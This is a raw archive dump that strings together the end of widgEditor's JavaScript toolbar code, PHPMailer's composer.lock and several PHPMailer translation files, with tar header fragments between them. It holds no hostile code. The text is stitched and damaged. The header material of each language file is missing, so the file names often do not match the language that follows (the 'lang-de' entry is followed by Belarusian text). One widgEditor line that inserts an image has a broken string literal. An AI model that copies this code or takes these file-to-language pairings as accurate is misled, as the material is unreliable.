widgToolbar.prototype.enable = function() { /* Change class to enable buttons using CSS */ this.theList.className = this.theList.className.replace(/ widgSource/, ""); /* Loop through lis */ for (var i = 0; i < this.theList.childNodes.length; i++) { var theChild = this.theList.childNodes[i]; if (theChild.nodeName.toLowerCase() == "li" && theChild.className == "widgEditSelect") { /* Loop through li children to find select */ for (j = 0; j < theChild.childNodes.length; j++) { if (theChild.childNodes[j].nodeName.toLowerCase() == "select") { theChild.childNodes[j].disabled = ""; break; } } } } return true; } /* Change the status of the selected toolbar item */ widgToolbar.prototype.setState = function(theState, theStatus) { if (theState != "SelectBlock") { var theButton = document.getElementById(this.theList.id + "Button" + theState); if (theButton != null) { if (theStatus == "on") { theButton.className = theButton.className.addClass("on"); } else { theButton.className = theButton.className.removeClass("on"); } } } else { var theSelect = document.getElementById(this.theList.id + "SelectBlock"); if (theSelect != null) { theSelect.value = ""; theSelect.value = theStatus; } } return true; } /* Action taken when toolbar item activated */ function widgToolbarAction() { var theToolbar = this.parentNode.parentNode.widgToolbarObject; var theWidgEditor = theToolbar.widgEditorObject; var theIframe = theWidgEditor.theIframe; var theSelection = ""; /* If somehow a button other than "HTML source" is clicked while viewing HTML source, ignore click */ if (!theWidgEditor.wysiwyg && this.action != "html") { return false; } switch (this.action) { case "formatblock": theIframe.contentWindow.document.execCommand(this.action, false, this.value); theWidgEditor.theToolbar.setState("SelectBlock", this.value); break; case "html": theWidgEditor.switchMode(); break; case "link": if (this.parentNode.className.classExists("on")) { theIframe.contentWindow.document.execCommand("Unlink", false, null); theWidgEditor.theToolbar.setState("Link", "off"); } else { if (theIframe.contentWindow.document.selection) { theSelection = theIframe.contentWindow.document.selection.createRange().text; if (theSelection == "") { alert("Please select the text you wish to hyperlink."); break; } } else { theSelection = theIframe.contentWindow.getSelection(); if (theSelection == "") { alert("Please select the text you wish to hyperlink."); break; } } var theURL = prompt("Enter the URL for this link:", "http://"); if (theURL != null) { theIframe.contentWindow.document.execCommand("CreateLink", false, theURL); theWidgEditor.theToolbar.setState("Link", "on"); } } break; case "image": var theImage = prompt("Enter the location for this image:", ""); if (theImage != null && theImage != "") { var theAlt = prompt("Enter the alternate text for this image:", ""); var theSelection = null; var theRange = null; /* IE selections */ if (theIframe.contentWindow.document.selection) { /* Escape quotes in alt text */ theAlt = theAlt.replace(/"/g, "'"); theSelection = theIframe.contentWindow.document.selection; theRange = theSelection.createRange(); theRange.collapse(false); theRange.pasteHTML("\"""); break; } /* Mozilla selections */ else { try { theSelection = theIframe.contentWindow.getSelection(); } catch (e) { return false; } theRange = theSelection.getRangeAt(0); theRange.collapse(false); var theImageNode = theIframe.contentWindow.document.createElement("img"); theImageNode.src = theImage; theImageNode.alt = theAlt; theRange.insertNode(theImageNode); break; } } else { return false; } default: theIframe.contentWindow.document.execCommand(this.action, false, null); var theAction = this.action.replace(/^./, function(match){return match.toUpperCase();}); /* Turn off unordered toolbar item if ordered toolbar item was activated */ if (this.action == "insertorderedlist") { theAction = "Ordered"; theWidgEditor.theToolbar.setState("Unordered", "off"); } /* Turn off ordered toolbar item if unordered toolbar item was activated */ if (this.action == "insertunorderedlist") { theAction = "Unordered"; theWidgEditor.theToolbar.setState("Ordered", "off"); } /* If toolbar item was turned on */ if (theIframe.contentWindow.document.queryCommandState(this.action, false, null)) { theWidgEditor.theToolbar.setState(theAction, "on"); } else { theWidgEditor.theToolbar.setState(theAction, "off"); } } if (theWidgEditor.wysiwyg == true) { theIframe.contentWindow.focus(); } else { theWidgEditor.theTextarea.focus(); } return false; } /* Check the nesting of the current cursor position/selection */ function widgToolbarCheckState(theWidgEditor, resubmit) { if (!resubmit) { /* Allow browser to update selection before using the selection */ setTimeout(function(){widgToolbarCheckState(theWidgEditor, true); return true;}, 500); } var theSelection = null; var theRange = null; var theParentNode = null; var theLevel = 0; /* Turn off all the buttons */ var menuListItems = theWidgEditor.theToolbar.theList.childNodes; for (var i = 0; i < menuListItems.length; i++) { menuListItems[i].className = menuListItems[i].className.removeClass("on"); } /* IE selections */ if (theWidgEditor.theIframe.contentWindow.document.selection) { theSelection = theWidgEditor.theIframe.contentWindow.document.selection; theRange = theSelection.createRange(); try { theParentNode = theRange.parentElement(); } catch (e) { return false; } } /* Mozilla selections */ else { try { theSelection = theWidgEditor.theIframe.contentWindow.getSelection(); } catch (e) { return false; } theRange = theSelection.getRangeAt(0); theParentNode = theRange.commonAncestorContainer; } while (theParentNode.nodeType == 3) { theParentNode = theParentNode.parentNode; } while (theParentNode.nodeName.toLowerCase() != "body") { switch (theParentNode.nodeName.toLowerCase()) { case "a": theWidgEditor.theToolbar.setState("Link", "on"); break; case "em": theWidgEditor.theToolbar.setState("Italic", "on"); break; case "li": break; case "ol": theWidgEditor.theToolbar.setState("Ordered", "on"); theWidgEditor.theToolbar.setState("Unordered", "off"); break; case "span": if (theParentNode.getAttribute("style") == "font-weight: bold;") { theWidgEditor.theToolbar.setState("Bold", "on"); } else if (theParentNode.getAttribute("style") == "font-style: italic;") { theWidgEditor.theToolbar.setState("Italic", "on"); } else if (theParentNode.getAttribute("style") == "font-weight: bold; font-style: italic;") { theWidgEditor.theToolbar.setState("Bold", "on"); theWidgEditor.theToolbar.setState("Italic", "on"); } else if (theParentNode.getAttribute("style") == "font-style: italic; font-weight: bold;") { theWidgEditor.theToolbar.setState("Bold", "on"); theWidgEditor.theToolbar.setState("Italic", "on"); } break; case "strong": theWidgEditor.theToolbar.setState("Bold", "on"); break; case "ul": theWidgEditor.theToolbar.setState("Unordered", "on"); theWidgEditor.theToolbar.setState("Ordered", "off"); break; default: theWidgEditor.theToolbar.setState("SelectBlock", "<" + theParentNode.nodeName.toLowerCase() + ">"); break; } theParentNode = theParentNode.parentNode; theLevel++; } return true; } /* Turn off browser status display for toolbar items */ function widgToolbarMouseover() { window.status = ""; return true; } function acceptableChildren(theNode) { var theChildren = theNode.childNodes; for (var i = 0; i < theChildren.length; i++) { if (!theChildren[i].nodeName.isAcceptedElementName()) { if (!theChildren[i].nodeName.isInlineName()) { if (theNode.nodeName.toLowerCase() == "p") { acceptableChildren(replaceNodeWithChildren(theNode)); return true; } changeNodeType(theChildren[i], "p"); } else { replaceNodeWithChildren(theChildren[i]); } i = -1; } } for (var i = 0; i < theChildren.length; i++) { acceptableChildren(theChildren[i]); } return true; } /* Change the type of a node, e.g. h3 to p */ function changeNodeType(theNode, nodeType) { var theChildren = new Array(); var theNewNode = document.createElement(nodeType); var theParent = theNode.parentNode; if (theParent != null) { for (var i = 0; i < theNode.childNodes.length; i++) { theChildren.push(theNode.childNodes[i].cloneNode(true)); } for (var i = 0; i < theChildren.length; i++) { theNewNode.appendChild(theChildren[i]); } theParent.replaceChild(theNewNode, theNode); } return true; } /* Replace a node with its children -- delete the item and move its children up one level in the hierarchy */ function replaceNodeWithChildren(theNode) { var theChildren = new Array(); var theParent = theNode.parentNode; if (theParent != null) { for (var i = 0; i < theNode.childNodes.length; i++) { theChildren.push(theNode.childNodes[i].cloneNode(true)); } for (var i = 0; i < theChildren.length; i++) { theParent.insertBefore(theChildren[i], theNode); } theParent.removeChild(theNode); return theParent; } return true; } /* Add a class to a string */ String.prototype.addClass = function(theClass) { if (this != "") { if (!this.classExists(theClass)) { return this + " " + theClass; } } else { return theClass; } return this; } /* Check if a class exists in a string */ String.prototype.classExists = function(theClass) { var regString = "(^| )" + theClass + "\W*"; var regExpression = new RegExp(regString); if (regExpression.test(this)) { return true; } return false; } /* Check if a string is the nodeName of an accepted element */ String.prototype.isAcceptedElementName = function() { var elementList = new Array("#text", "a", "em", "h1", "h2", "h3", "h4", "h5", "h6", "img", "li", "ol", "p", "strong", "ul"); var theName = this.toLowerCase(); for (var i = 0; i < elementList.length; i++) { if (theName == elementList[i]) { return true; } } return false; } /* Check if a string is the nodeName of an inline element */ String.prototype.isInlineName = function() { var inlineList = new Array("#text", "a", "em", "font", "span", "strong", "u"); var theName = this.toLowerCase(); for (var i = 0; i < inlineList.length; i++) { if (theName == inlineList[i]) { return true; } } return false; } /* Remove a class from a string */ String.prototype.removeClass = function(theClass) { var regString = "(^| )" + theClass + "\W*"; var regExpression = new RegExp(regString); return this.replace(regExpression, ""); } /* Reverse a string */ String.prototype.reverse = function() { var theString = ""; for (var i = this.length - 1; i >= 0; i--) { theString += this.charAt(i); } return theString; } /* Make tags valid by converting uppercase element and attribute names to lowercase and quoting attributes */ String.prototype.validTags = function() { var theString = this; /* Replace uppercase element names with lowercase */ theString = theString.replace(/<[^> ]*/g, function(match){return match.toLowerCase();}); /* Replace uppercase attribute names with lowercase */ theString = theString.replace(/<[^>]*>/g, function(match) { match = match.replace(/ [^=]+=/g, function(match2){return match2.toLowerCase();}); return match; }); /* Put quotes around unquoted attributes */ theString = theString.replace(/<[^>]*>/g, function(match) { match = match.replace(/( [^=]+=)([^"][^ >]*)/g, "$1\"$2\""); return match; }); return theString; }PHPMailer/composer.lock000064400000007707151032724670011050 0ustar00{ "_readme": [ "This file locks the dependencies of your project to a known state", "Read more about it at https://getcomposer.org/doc/01-basic-usage.md#installing-dependencies", "This file is @generated automatically" ], "content-hash": "d4bbe1ace33ba4304c8d4da0a8d4905d", "packages": [ { "name": "phpmailer/phpmailer", "version": "v6.7.1", "source": { "type": "git", "url": "https://github.com/PHPMailer/PHPMailer.git", "reference": "49cd7ea3d2563f028d7811f06864a53b1f15ff55" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/PHPMailer/PHPMailer/zipball/49cd7ea3d2563f028d7811f06864a53b1f15ff55", "reference": "49cd7ea3d2563f028d7811f06864a53b1f15ff55", "shasum": "" }, "require": { "ext-ctype": "*", "ext-filter": "*", "ext-hash": "*", "php": ">=5.5.0" }, "require-dev": { "dealerdirect/phpcodesniffer-composer-installer": "^0.7.2", "doctrine/annotations": "^1.2.6 || ^1.13.3", "php-parallel-lint/php-console-highlighter": "^1.0.0", "php-parallel-lint/php-parallel-lint": "^1.3.2", "phpcompatibility/php-compatibility": "^9.3.5", "roave/security-advisories": "dev-latest", "squizlabs/php_codesniffer": "^3.7.1", "yoast/phpunit-polyfills": "^1.0.4" }, "suggest": { "ext-mbstring": "Needed to send email in multibyte encoding charset or decode encoded addresses", "ext-openssl": "Needed for secure SMTP sending and DKIM signing", "greew/oauth2-azure-provider": "Needed for Microsoft Azure XOAUTH2 authentication", "hayageek/oauth2-yahoo": "Needed for Yahoo XOAUTH2 authentication", "league/oauth2-google": "Needed for Google XOAUTH2 authentication", "psr/log": "For optional PSR-3 debug logging", "symfony/polyfill-mbstring": "To support UTF-8 if the Mbstring PHP extension is not enabled (^1.2)", "thenetworg/oauth2-azure": "Needed for Microsoft XOAUTH2 authentication" }, "type": "library", "autoload": { "psr-4": { "PHPMailer\\PHPMailer\\": "src/" } }, "notification-url": "https://packagist.org/downloads/", "license": [ "LGPL-2.1-only" ], "authors": [ { "name": "Marcus Bointon", "email": "phpmailer@synchromedia.co.uk" }, { "name": "Jim Jagielski", "email": "jimjag@gmail.com" }, { "name": "Andy Prevost", "email": "codeworxtech@users.sourceforge.net" }, { "name": "Brent R. Matzelle" } ], "description": "PHPMailer is a full-featured email creation and transfer class for PHP", "support": { "issues": "https://github.com/PHPMailer/PHPMailer/issues", "source": "https://github.com/PHPMailer/PHPMailer/tree/v6.7.1" }, "funding": [ { "url": "https://github.com/Synchro", "type": "github" } ], "time": "2022-12-08T13:30:06+00:00" } ], "packages-dev": [], "aliases": [], "minimum-stability": "stable", "stability-flags": [], "prefer-stable": false, "prefer-lowest": false, "platform": [], "platform-dev": [], "plugin-api-version": "2.3.0" } PHPMailer/vendor/autoload.php000064400000001403151032724670012150 0ustar00 * @fixed by Boris Yurchenko */ $PHPMAILER_LANG['authenticate'] = 'Помилка SMTP: помилка авторизації.'; $PHPMAILER_LANG['connect_host'] = 'Помилка SMTP: не вдається під\'єднатися до SMTP-серверу.'; $PHPMAILER_LANG['data_not_accepted'] = 'Помилка SMTP: дані не прийнято.'; $PHPMAILER_LANG['encoding'] = 'Невідоме кодування: '; $PHPMAILER_LANG['execute'] = 'Неможливо виконати команду: '; $PHPMAILER_LANG['file_access'] = 'Немає доступу до файлу: '; $PHPMAILER_LANG['file_open'] = 'Помилка файлової системи: не вдається відкрити файл: '; $PHPMAILER_LANG['from_failed'] = 'Невірна адреса відправника: '; $PHPMAILER_LANG['instantiate'] = 'Неможливо запустити функцію mail().'; $PHPMAILER_LANG['provide_address'] = 'Будь ласка, введіть хоча б одну email-адресу отримувача.'; $PHPMAILER_LANG['mailer_not_supported'] = ' - поштовий сервер не підтримується.'; $PHPMAILER_LANG['recipients_failed'] = 'Помилка SMTP: не вдалося відправлення для таких отримувачів: '; $PHPMAILER_LANG['empty_message'] = 'Пусте повідомлення'; $PHPMAILER_LANG['invalid_address'] = 'Не відправлено через неправильний формат email-адреси: '; $PHPMAILER_LANG['signing'] = 'Помилка підпису: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Помилка з\'єднання з SMTP-сервером'; $PHPMAILER_LANG['smtp_error'] = 'Помилка SMTP-сервера: '; $PHPMAILER_LANG['variable_set'] = 'Неможливо встановити або скинути змінну: '; $PHPMAILER_LANG['extension_missing'] = 'Розширення відсутнє: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-gl.php000064400000003316151032724670021373 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'Erro SMTP: Non puido ser autentificado.'; $PHPMAILER_LANG['connect_host'] = 'Erro SMTP: Non puido conectar co servidor SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'Erro SMTP: Datos non aceptados.'; $PHPMAILER_LANG['empty_message'] = 'Corpo da mensaxe vacía'; $PHPMAILER_LANG['encoding'] = 'Codificación descoñecida: '; $PHPMAILER_LANG['execute'] = 'Non puido ser executado: '; $PHPMAILER_LANG['file_access'] = 'Nob puido acceder ó arquivo: '; $PHPMAILER_LANG['file_open'] = 'Erro de Arquivo: No puido abrir o arquivo: '; $PHPMAILER_LANG['from_failed'] = 'A(s) seguinte(s) dirección(s) de remitente(s) deron erro: '; $PHPMAILER_LANG['instantiate'] = 'Non puido crear unha instancia da función Mail.'; $PHPMAILER_LANG['invalid_address'] = 'Non puido envia-lo correo: dirección de email inválida: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer non está soportado.'; $PHPMAILER_LANG['provide_address'] = 'Debe engadir polo menos unha dirección de email coma destino.'; $PHPMAILER_LANG['recipients_failed'] = 'Erro SMTP: Os seguintes destinos fallaron: '; $PHPMAILER_LANG['signing'] = 'Erro ó firmar: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() fallou.'; $PHPMAILER_LANG['smtp_error'] = 'Erro do servidor SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Non puidemos axustar ou reaxustar a variábel: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-ko.php000064400000003353151032724670021403 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'SMTP 오류: 인증할 수 없습니다.'; $PHPMAILER_LANG['connect_host'] = 'SMTP 오류: SMTP 호스트에 접속할 수 없습니다.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP 오류: 데이터가 받아들여지지 않았습니다.'; $PHPMAILER_LANG['empty_message'] = '메세지 내용이 없습니다'; $PHPMAILER_LANG['encoding'] = '알 수 없는 인코딩: '; $PHPMAILER_LANG['execute'] = '실행 불가: '; $PHPMAILER_LANG['file_access'] = '파일 접근 불가: '; $PHPMAILER_LANG['file_open'] = '파일 오류: 파일을 열 수 없습니다: '; $PHPMAILER_LANG['from_failed'] = '다음 From 주소에서 오류가 발생했습니다: '; $PHPMAILER_LANG['instantiate'] = 'mail 함수를 인스턴스화할 수 없습니다'; $PHPMAILER_LANG['invalid_address'] = '잘못된 주소: '; $PHPMAILER_LANG['mailer_not_supported'] = ' 메일러는 지원되지 않습니다.'; $PHPMAILER_LANG['provide_address'] = '적어도 한 개 이상의 수신자 메일 주소를 제공해야 합니다.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP 오류: 다음 수신자에서 오류가 발생했습니다: '; $PHPMAILER_LANG['signing'] = '서명 오류: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP 연결을 실패하였습니다.'; $PHPMAILER_LANG['smtp_error'] = 'SMTP 서버 오류: '; $PHPMAILER_LANG['variable_set'] = '변수 설정 및 초기화 불가: '; $PHPMAILER_LANG['extension_missing'] = '확장자 없음: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-fo.php000064400000003145151032724670021375 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'SMTP feilur: Kundi ikki góðkenna.'; $PHPMAILER_LANG['connect_host'] = 'SMTP feilur: Kundi ikki knýta samband við SMTP vert.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP feilur: Data ikki góðkent.'; //$PHPMAILER_LANG['empty_message'] = 'Message body empty'; $PHPMAILER_LANG['encoding'] = 'Ókend encoding: '; $PHPMAILER_LANG['execute'] = 'Kundi ikki útføra: '; $PHPMAILER_LANG['file_access'] = 'Kundi ikki tilganga fílu: '; $PHPMAILER_LANG['file_open'] = 'Fílu feilur: Kundi ikki opna fílu: '; $PHPMAILER_LANG['from_failed'] = 'fylgjandi Frá/From adressa miseydnaðist: '; $PHPMAILER_LANG['instantiate'] = 'Kuni ikki instantiera mail funktión.'; //$PHPMAILER_LANG['invalid_address'] = 'Invalid address: '; $PHPMAILER_LANG['mailer_not_supported'] = ' er ikki supporterað.'; $PHPMAILER_LANG['provide_address'] = 'Tú skal uppgeva minst móttakara-emailadressu(r).'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Feilur: Fylgjandi móttakarar miseydnaðust: '; //$PHPMAILER_LANG['signing'] = 'Signing Error: '; //$PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() failed.'; //$PHPMAILER_LANG['smtp_error'] = 'SMTP server error: '; //$PHPMAILER_LANG['variable_set'] = 'Cannot set or reset variable: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-af.php000064400000003060151032724670021353 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'خطأ SMTP : لا يمكن تأكيد الهوية.'; $PHPMAILER_LANG['connect_host'] = 'خطأ SMTP: لا يمكن الاتصال بالخادم SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'خطأ SMTP: لم يتم قبول المعلومات .'; $PHPMAILER_LANG['empty_message'] = 'نص الرسالة فارغ'; $PHPMAILER_LANG['encoding'] = 'ترميز غير معروف: '; $PHPMAILER_LANG['execute'] = 'لا يمكن تنفيذ : '; $PHPMAILER_LANG['file_access'] = 'لا يمكن الوصول للملف: '; $PHPMAILER_LANG['file_open'] = 'خطأ في الملف: لا يمكن فتحه: '; $PHPMAILER_LANG['from_failed'] = 'خطأ على مستوى عنوان المرسل : '; $PHPMAILER_LANG['instantiate'] = 'لا يمكن توفير خدمة البريد.'; $PHPMAILER_LANG['invalid_address'] = 'الإرسال غير ممكن لأن عنوان البريد الإلكتروني غير صالح: '; $PHPMAILER_LANG['mailer_not_supported'] = ' برنامج الإرسال غير مدعوم.'; $PHPMAILER_LANG['provide_address'] = 'يجب توفير عنوان البريد الإلكتروني لمستلم واحد على الأقل.'; $PHPMAILER_LANG['recipients_failed'] = 'خطأ SMTP: الأخطاء التالية فشل في الارسال لكل من : '; $PHPMAILER_LANG['signing'] = 'خطأ في التوقيع: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() غير ممكن.'; $PHPMAILER_LANG['smtp_error'] = 'خطأ على مستوى الخادم SMTP: '; $PHPMAILER_LANG['variable_set'] = 'لا يمكن تعيين أو إعادة تعيين متغير: '; $PHPMAILER_LANG['extension_missing'] = 'الإضافة غير موجودة: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-de.php000064400000003536151032724670021365 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'Памылка SMTP: памылка ідэнтыфікацыі.'; $PHPMAILER_LANG['connect_host'] = 'Памылка SMTP: нельга ўстанавіць сувязь з SMTP-серверам.'; $PHPMAILER_LANG['data_not_accepted'] = 'Памылка SMTP: звесткі непрынятыя.'; $PHPMAILER_LANG['empty_message'] = 'Пустое паведамленне.'; $PHPMAILER_LANG['encoding'] = 'Невядомая кадыроўка тэксту: '; $PHPMAILER_LANG['execute'] = 'Нельга выканаць каманду: '; $PHPMAILER_LANG['file_access'] = 'Няма доступу да файла: '; $PHPMAILER_LANG['file_open'] = 'Нельга адкрыць файл: '; $PHPMAILER_LANG['from_failed'] = 'Няправільны адрас адпраўніка: '; $PHPMAILER_LANG['instantiate'] = 'Нельга прымяніць функцыю mail().'; $PHPMAILER_LANG['invalid_address'] = 'Нельга даслаць паведамленне, няправільны email атрымальніка: '; $PHPMAILER_LANG['provide_address'] = 'Запоўніце, калі ласка, правільны email атрымальніка.'; $PHPMAILER_LANG['mailer_not_supported'] = ' - паштовы сервер не падтрымліваецца.'; $PHPMAILER_LANG['recipients_failed'] = 'Памылка SMTP: няправільныя атрымальнікі: '; $PHPMAILER_LANG['signing'] = 'Памылка подпісу паведамлення: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Памылка сувязі з SMTP-серверам.'; $PHPMAILER_LANG['smtp_error'] = 'Памылка SMTP: '; $PHPMAILER_LANG['variable_set'] = 'Нельга ўстанавіць або перамяніць значэнне пераменнай: '; //$PHPMAILER_LANG['extension_missing'] = 'Extension missing: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-sk.php000064400000003565151032724670021414 0ustar00 * @author Peter Orlický */ $PHPMAILER_LANG['authenticate'] = 'SMTP Error: Chyba autentifikácie.'; $PHPMAILER_LANG['connect_host'] = 'SMTP Error: Nebolo možné nadviazať spojenie so SMTP serverom.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP Error: Dáta neboli prijaté'; $PHPMAILER_LANG['empty_message'] = 'Prázdne telo správy.'; $PHPMAILER_LANG['encoding'] = 'Neznáme kódovanie: '; $PHPMAILER_LANG['execute'] = 'Nedá sa vykonať: '; $PHPMAILER_LANG['file_access'] = 'Súbor nebol nájdený: '; $PHPMAILER_LANG['file_open'] = 'File Error: Súbor sa otvoriť pre čítanie: '; $PHPMAILER_LANG['from_failed'] = 'Následujúca adresa From je nesprávna: '; $PHPMAILER_LANG['instantiate'] = 'Nedá sa vytvoriť inštancia emailovej funkcie.'; $PHPMAILER_LANG['invalid_address'] = 'Neodoslané, emailová adresa je nesprávna: '; $PHPMAILER_LANG['invalid_hostentry'] = 'Záznam hostiteľa je nesprávny: '; $PHPMAILER_LANG['invalid_host'] = 'Hostiteľ je nesprávny: '; $PHPMAILER_LANG['mailer_not_supported'] = ' emailový klient nieje podporovaný.'; $PHPMAILER_LANG['provide_address'] = 'Musíte zadať aspoň jednu emailovú adresu príjemcu.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP Error: Adresy príjemcov niesu správne '; $PHPMAILER_LANG['signing'] = 'Chyba prihlasovania: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() zlyhalo.'; $PHPMAILER_LANG['smtp_error'] = 'SMTP chyba serveru: '; $PHPMAILER_LANG['variable_set'] = 'Nemožno nastaviť alebo resetovať premennú: '; $PHPMAILER_LANG['extension_missing'] = 'Chýba rozšírenie: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-az.php000064400000003325151032724670021403 0ustar00 * @author Filip Š * @author Blaž Oražem */ $PHPMAILER_LANG['authenticate'] = 'SMTP napaka: Avtentikacija ni uspela.'; $PHPMAILER_LANG['buggy_php'] = 'Na vašo PHP različico vpliva napaka, ki lahko povzroči poškodovana sporočila. Če želite težavo odpraviti, preklopite na pošiljanje prek SMTP, onemogočite možnost mail.add_x_header v vaši php.ini datoteki, preklopite na MacOS ali Linux, ali nadgradite vašo PHP zaličico na 7.0.17+ ali 7.1.3+.'; $PHPMAILER_LANG['connect_host'] = 'SMTP napaka: Vzpostavljanje povezave s SMTP gostiteljem ni uspelo.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP napaka: Strežnik zavrača podatke.'; $PHPMAILER_LANG['empty_message'] = 'E-poštno sporočilo nima vsebine.'; $PHPMAILER_LANG['encoding'] = 'Nepoznan tip kodiranja: '; $PHPMAILER_LANG['execute'] = 'Operacija ni uspela: '; $PHPMAILER_LANG['extension_missing'] = 'Manjkajoča razširitev: '; $PHPMAILER_LANG['file_access'] = 'Nimam dostopa do datoteke: '; $PHPMAILER_LANG['file_open'] = 'Ne morem odpreti datoteke: '; $PHPMAILER_LANG['from_failed'] = 'Neveljaven e-naslov pošiljatelja: '; $PHPMAILER_LANG['instantiate'] = 'Ne morem inicializirati mail funkcije.'; $PHPMAILER_LANG['invalid_address'] = 'E-poštno sporočilo ni bilo poslano. E-naslov je neveljaven: '; $PHPMAILER_LANG['invalid_header'] = 'Neveljavno ime ali vrednost glave'; $PHPMAILER_LANG['invalid_hostentry'] = 'Neveljaven vnos gostitelja: '; $PHPMAILER_LANG['invalid_host'] = 'Neveljaven gostitelj: '; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer ni podprt.'; $PHPMAILER_LANG['provide_address'] = 'Prosimo, vnesite vsaj enega naslovnika.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP napaka: Sledeči naslovniki so neveljavni: '; $PHPMAILER_LANG['signing'] = 'Napaka pri podpisovanju: '; $PHPMAILER_LANG['smtp_code'] = 'SMTP koda: '; $PHPMAILER_LANG['smtp_code_ex'] = 'Dodatne informacije o SMTP: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Ne morem vzpostaviti povezave s SMTP strežnikom.'; $PHPMAILER_LANG['smtp_detail'] = 'Podrobnosti: '; $PHPMAILER_LANG['smtp_error'] = 'Napaka SMTP strežnika: '; $PHPMAILER_LANG['variable_set'] = 'Ne morem nastaviti oz. ponastaviti spremenljivke: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-sv.php000064400000003112151032724670021413 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'SMTP fel: Kunde inte autentisera.'; $PHPMAILER_LANG['connect_host'] = 'SMTP fel: Kunde inte ansluta till SMTP-server.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP fel: Data accepterades inte.'; //$PHPMAILER_LANG['empty_message'] = 'Message body empty'; $PHPMAILER_LANG['encoding'] = 'Okänt encode-format: '; $PHPMAILER_LANG['execute'] = 'Kunde inte köra: '; $PHPMAILER_LANG['file_access'] = 'Ingen åtkomst till fil: '; $PHPMAILER_LANG['file_open'] = 'Fil fel: Kunde inte öppna fil: '; $PHPMAILER_LANG['from_failed'] = 'Följande avsändaradress är felaktig: '; $PHPMAILER_LANG['instantiate'] = 'Kunde inte initiera e-postfunktion.'; $PHPMAILER_LANG['invalid_address'] = 'Felaktig adress: '; $PHPMAILER_LANG['provide_address'] = 'Du måste ange minst en mottagares e-postadress.'; $PHPMAILER_LANG['mailer_not_supported'] = ' mailer stöds inte.'; $PHPMAILER_LANG['recipients_failed'] = 'SMTP fel: Följande mottagare är felaktig: '; $PHPMAILER_LANG['signing'] = 'Signeringsfel: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'SMTP Connect() misslyckades.'; $PHPMAILER_LANG['smtp_error'] = 'SMTP serverfel: '; $PHPMAILER_LANG['variable_set'] = 'Kunde inte definiera eller återställa variabel: '; $PHPMAILER_LANG['extension_missing'] = 'Tillägg ej tillgängligt: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-sr.php000064400000004375151032724670021423 0ustar00 * @author Miloš Milanović */ $PHPMAILER_LANG['authenticate'] = 'SMTP грешка: аутентификација није успела.'; $PHPMAILER_LANG['connect_host'] = 'SMTP грешка: повезивање са SMTP сервером није успело.'; $PHPMAILER_LANG['data_not_accepted'] = 'SMTP грешка: подаци нису прихваћени.'; $PHPMAILER_LANG['empty_message'] = 'Садржај поруке је празан.'; $PHPMAILER_LANG['encoding'] = 'Непознато кодирање: '; $PHPMAILER_LANG['execute'] = 'Није могуће извршити наредбу: '; $PHPMAILER_LANG['file_access'] = 'Није могуће приступити датотеци: '; $PHPMAILER_LANG['file_open'] = 'Није могуће отворити датотеку: '; $PHPMAILER_LANG['from_failed'] = 'SMTP грешка: слање са следећих адреса није успело: '; $PHPMAILER_LANG['recipients_failed'] = 'SMTP грешка: слање на следеће адресе није успело: '; $PHPMAILER_LANG['instantiate'] = 'Није могуће покренути mail функцију.'; $PHPMAILER_LANG['invalid_address'] = 'Порука није послата. Неисправна адреса: '; $PHPMAILER_LANG['mailer_not_supported'] = ' мејлер није подржан.'; $PHPMAILER_LANG['provide_address'] = 'Дефинишите бар једну адресу примаоца.'; $PHPMAILER_LANG['signing'] = 'Грешка приликом пријаве: '; $PHPMAILER_LANG['smtp_connect_failed'] = 'Повезивање са SMTP сервером није успело.'; $PHPMAILER_LANG['smtp_error'] = 'Грешка SMTP сервера: '; $PHPMAILER_LANG['variable_set'] = 'Није могуће задати нити ресетовати променљиву: '; $PHPMAILER_LANG['extension_missing'] = 'Недостаје проширење: '; PHPMailer/vendor/phpmailer/phpmailer/language/phpmailer.lang-he.php000064400000003424151032724670021365 0ustar00 */ $PHPMAILER_LANG['authenticate'] = 'שגיאת SMTP: פעולת האימות נכשלה.'; $PHPMAILER_LANG['connect_host'] = 'שגיאת SMTP: לא הצלחתי להתחבר לשרת SMTP.'; $PHPMAILER_LANG['data_not_accepted'] = 'שגיאת SMTP: מידע לא התקבל.'; $PHPMAILER_LANG['empty_message'] = 'גוף ההודעה ריק'; 